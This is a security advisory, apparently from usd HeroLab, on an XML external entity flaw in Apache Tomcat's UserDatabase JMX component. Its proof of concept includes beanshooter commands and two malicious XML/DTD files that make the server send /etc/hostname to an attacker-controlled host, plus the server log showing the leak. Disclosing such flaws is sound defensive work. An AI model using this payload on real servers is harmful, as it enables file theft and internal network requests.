{"id":19195,"date":"2022-11-24T13:48:57","date_gmt":"2022-11-24T12:48:57","guid":{"rendered":"https:\/\/herolab.usd.de\/?page_id=19195"},"modified":"2022-11-24T13:49:00","modified_gmt":"2022-11-24T12:49:00","slug":"usd-2022-0036","status":"publish","type":"page","link":"https:\/\/herolab.usd.de\/en\/security-advisories\/usd-2022-0036\/","title":{"rendered":"usd-2022-0036"},"content":{"rendered":"

[et_pb_section fb_built=\"1\" _builder_version=\"4.16\" _module_preset=\"default\" background_color=\"#2E353D\" custom_padding=\"||0px|||\" global_colors_info=\"{}\"][et_pb_row _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_column type=\"4_4\" _builder_version=\"4.16\" _module_preset=\"default\" global_colors_info=\"{}\"][et_pb_text _builder_version=\"4.18.0\" _module_preset=\"cc5ac6f4-ebbd-4b3f-bc92-4dfc1f15fe2c\" global_colors_info=\"{}\"]<\/p>\n

usd-2022-0036 | XML External Entity Injection in Apache Tomcat via JMX<\/h1>\n

<\/h1>\n

Advisory ID<\/strong>: usd-2022-0036
Product<\/strong>: Apache Tomcat
Affected Version<\/strong>: Tested on Apache Tomcat 9.0.58, probably others
Vulnerability Type<\/strong>: Improper Restriction of XML External Entity Reference (CWE-611)
Security Risk<\/strong>: Medium
Vendor URL<\/strong>: https:\/\/tomcat.apache.org\/<\/a>
Vendor acknowledged vulnerability<\/strong>: No
Vendor Status<\/strong>: Not fixed<\/p>\n

\n

Tomcat deliberatley allows external xml entities as configuration files are expected to be only controllable by trusted users. Because of this, this issue does not meet the Apache Foundations bar for servicing in a security update.<\/p>\n<\/blockquote>\n

Affected Component(s)<\/h3>\n

The vulnerability affects the UserDatabase JMX <\/a>component of Apache Tomcat<\/em>. This MBean<\/em> is capable of managing users and roles with access to the Apache Tomcat<\/em> server.<\/p>\n

Description<\/h3>\n

Apache Tomcat<\/em> is a popular open source webserver for running Java<\/em> based web applications and can be monitored via JMX<\/em>. JMX<\/em> (Java Management Extensions<\/em>), on the other hand, is a popular framework that allows monitoring and maintaining Java <\/em>based applications over the network. Unauthorized access to JMX<\/em> is a well known attack vector that grants the attacker plenty of possibilities to compromise the underlying application server. That being said, the overall exploitability strongly depends on the available MBeans<\/em>, the configured JMX<\/em> permissions and the presence of a Security Manager<\/em>. Depending on the above mentioned settings, the consequences of an attacker with JMX<\/em> access can range from critical Remote Code Execution<\/em> (RCE<\/em>) issues to medium severity information leakage.<\/p>\n

Finding new ways of abusing available MBeans<\/em> for malicious purposes is therefore an interesting target for attackers. We identified that the UserDatabase MBean<\/em>, which is available per default on Apache Tomcat<\/em> servers with JMX<\/em> enabled, can be abused for XML External Entity Injection<\/em> (XXE<\/em>) attacks. This may allow an attacker to read local files from the affected system or to perform further requests within the internal network on the affected systems behalf.<\/p>\n

Proof of Concept<\/h3>\n

For the following proof of concept, we use an Apache Tomcat<\/em> server located at 172.17.0.2<\/strong> with JMX<\/em> enabled on port 1090<\/strong>. Furthermore, we use the beanshooter<\/a> tool to demonstrate a possible attack.<\/p>\n

First of all, we can enumerate available methods and attributes from the UserDatabase MBean<\/em> using the following command:<\/p>\n

\n
<\/span>[user@host ~]$ <\/span>beanshooter info 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase[+] MBean Class: org.apache.catalina.mbeans.MemoryUserDatabaseMBean<\/span>[+] ObjectName: Users:type=UserDatabase,database=UserDatabase<\/span>[+]<\/span>[+]     Attributes:<\/span>[+]         modelerType (type: java.lang.String , writable: false)<\/span>[+]         readonly (type: boolean , writable: false)<\/span>[+]         roles (type: [Ljava.lang.String; , writable: false)<\/span>[+]         groups (type: [Ljava.lang.String; , writable: false)<\/span>[+]         users (type: [Ljava.lang.String; , writable: false)<\/span>[+]         pathname (type: java.lang.String , writable: true)<\/span>[+]         writable (type: null , writable: false)<\/span>[+]<\/span>[+]     Operations:<\/span>[+]         java.lang.String findGroup(java.lang.String groupname)<\/span>[+]         java.lang.String createUser(java.lang.String username, java.lang.String password, java.lang.String fullName)<\/span>[+]         void removeGroup(java.lang.String groupname)<\/span>[+]         void removeUser(java.lang.String username)<\/span>[+]         void save()<\/span>[+]         java.lang.String findRole(java.lang.String rolename)<\/span>[+]         void removeRole(java.lang.String rolename)<\/span>[+]         java.lang.String createGroup(java.lang.String groupname, java.lang.String description)<\/span>[+]         java.lang.String findUser(java.lang.String username)<\/span>[+]         java.lang.String createRole(java.lang.String rolename, java.lang.String description)<\/span><\/pre>\n<\/div>\n
Apache Tomcat<\/em> users are usually defined within the file \/usr\/local\/tomcat\/conf\/tomcat-users.xml<\/strong>, but as one can see, the pathname<\/strong> property of the UserDatabase<\/em> is writable and it is possible to change the location. Surprisingly, even remote locations are allowed by using a remote URI<\/em> like http:\/\/172.17.0.1\/test.xml.<\/a><\/em><\/em>This enables an attacker to provide a malicious XML<\/em> file that contains an XXE<\/em> payload. The following listing shows an example where two malicious XML<\/em> files are used to exfiltrate local files using an outbound connection:<\/p>\n
\n
<\/span>[qtc@devbox www]$ <\/span>cat test.xml<?xml version='1.0' encoding='utf-8'?><\/span><!DOCTYPE tomcat-users [<\/span><!ENTITY % file SYSTEM \"file:\/\/\/etc\/hostname\"><\/span><!ENTITY % dtd SYSTEM \"[http:\/\/172.17.0.1:8000\/test.dtd\">]()<\/span>%<\/span>dtd;<\/span>]><\/span><tomcat-users xmlns=\"[http:\/\/tomcat.apache.org\/xml\"]()<\/span>              xmlns:xsi=\"[http:\/\/www.w3.org\/2001\/XMLSchema-instance\"]()<\/span>              xsi:schemaLocation=\"[http:\/\/tomcat.apache.org\/xml]() tomcat-users.xsd\"<\/span>              version=\"1.0\"><\/span>    &send;<\/span><\/tomcat-users><\/span>[qtc@devbox www]$ <\/span>cat test.dtd<?xml version=\"1.0\" encoding=\"UTF-8\"?><\/span><!ENTITY % all \"<!ENTITY send SYSTEM '[http:\/\/172.17.0.1:8000\/?file=%file;'>\">]()<\/span>%<\/span>all;<\/span><\/pre>\n<\/div>\n
By changing the pathname<\/strong> property of the UserDatabase MBean<\/em>, it is possible to load the malicious XML<\/em> documents from an attacker controlled server. After the XML<\/em> files were obtained, the JMX<\/em> server sends the content of the file \/etc\/hostname<\/strong> to the attacker controlled system:<\/p>\n
\n
<\/span>[qtc@devbox ~]$ <\/span>beanshooter attr 172<\/span>.17.0.2 1090<\/span> Users:type=<\/span>UserDatabase,database=<\/span>UserDatabase pathname [<\/span>http:\/\/172.17.0.1:8000\/test.xml]()<\/span>[qtc@devbox www]$ <\/span>python3 -m http.serverServing HTTP on 0.0.0.0 port 8000 ([http:\/\/0.0.0.0:8000\/)]() ...<\/span>172.17.0.2 - - [02\/Aug\/2022 07:20:35] \"GET \/test.xml HTTP\/1.1\" 200 -<\/span>172.17.0.2 - - [02\/Aug\/2022 07:20:35] \"GET \/test.dtd HTTP\/1.1\" 200 -<\/span>172.17.0.2 - - [02\/Aug\/2022 07:20:35] \"GET \/?file=76b0620c44ea HTTP\/1.1\" 200<\/span><\/pre>\n<\/div>\n
Fix<\/h3>\n
Processing of external entities within the user database of Apache Tomcat<\/em> should be disabled by default. Enabling the processing of external entities as a feature can still be possible by creating a corresponding configuration option.<\/p>\n
References<\/h3>\n